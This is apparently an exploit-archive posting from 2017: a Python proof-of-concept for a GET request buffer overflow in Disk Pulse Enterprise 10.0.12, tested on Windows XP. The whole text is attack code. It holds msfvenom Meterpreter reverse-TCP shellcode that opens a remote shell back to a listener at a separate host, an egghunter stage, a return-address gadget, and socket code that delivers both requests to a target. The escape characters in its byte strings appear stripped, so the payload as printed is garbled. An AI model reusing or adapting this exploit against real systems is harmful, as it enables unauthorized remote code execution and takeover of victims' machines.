Disk Pulse Enterprise 10.0.12 GET Buffer Overflow
Posted on 26 September 2017
# Tested on Windows XP SP3 (x86) # The application requires to have the web server enabled. #!/usr/bin/python import socket, threading, struct host = "192.168.228.155" port = 80 def send_egghunter_request(): # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.228.158 LPORT=443 -f py buf = "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b" buf += "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7" buf += "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf" buf += "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c" buf += "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01" buf += "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31" buf += "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d" buf += "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66" buf += "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0" buf += "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f" buf += "x5fx5ax8bx12xebx8dx5dx68x33x32x00x00x68" buf += "x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8" buf += "x90x01x00x00x29xc4x54x50x68x29x80x6bx00" buf += "xffxd5x6ax0ax68xc0xa8xe4x9ex68x02x00x01" buf += "xbbx89xe6x50x50x50x50x40x50x40x50x68xea" buf += "x0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5" buf += "x74x61xffxd5x85xc0x74x0axffx4ex08x75xec" buf += "xe8x61x00x00x00x6ax00x6ax04x56x57x68x02" buf += "xd9xc8x5fxffxd5x83xf8x00x7ex36x8bx36x6a" buf += "x40x68x00x10x00x00x56x6ax00x68x58xa4x53" buf += "xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9" buf += "xc8x5fxffxd5x83xf8x00x7dx22x58x68x00x40" buf += "x00x00x6ax00x50x68x0bx2fx0fx30xffxd5x57" buf += "x68x75x6ex4dx61xffxd5x5ex5exffx0cx24xe9" buf += "x71xffxffxffx01xc3x29xc6x75xc7xc3xbbxf0" buf += "xb5xa2x56x6ax00x53xffxd5" egghunter = "W00T" * 2 egghunter += "x90" * 16 # Padding egghunter += buf egghunter += "x42" * (100000 - len(egghunter)) content_length = len(egghunter) + 1000 # Just 1000 padding. egghunter_request = "POST / HTTP/1.1 " egghunter_request += "Content-Type: multipart/form-data; boundary=evilBoundary " egghunter_request += "Content-Length: " + str(content_length) + " " egghunter_request += " " egghunter_request += egghunter s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(egghunter_request) s.recv(1024) s.close() def send_exploit_request(): buffer = "x90" * 2495 buffer += "xebx06x90x90" # short jump buffer += struct.pack("<L", 0x1014fdef) # POP ESI; POP EBX; RETN - libspp # ./egghunter.rb -b "x00x0ax0b" -e "W00T" -f py buffer += "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3c" buffer += "x05x5ax74xefxb8x57x30x30x54x89xd7xafx75" buffer += "xeaxafx75xe7xffxe7" buffer += "x41" * (6000 - len(buffer)) #HTTP Request request = "GET /" + buffer + "HTTP/1.1" + " " request += "Host: " + host + " " request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + " " request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + " " request += "Accept-Language: en-US,en;q=0.5" + " " request += "Accept-Encoding: gzip, deflate" + " " request += "Connection: keep-alive" + " " s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(request) s.close() if __name__ == "__main__": t = threading.Thread(target=send_egghunter_request) t.start() print "[+] Thread started." send_exploit_request()
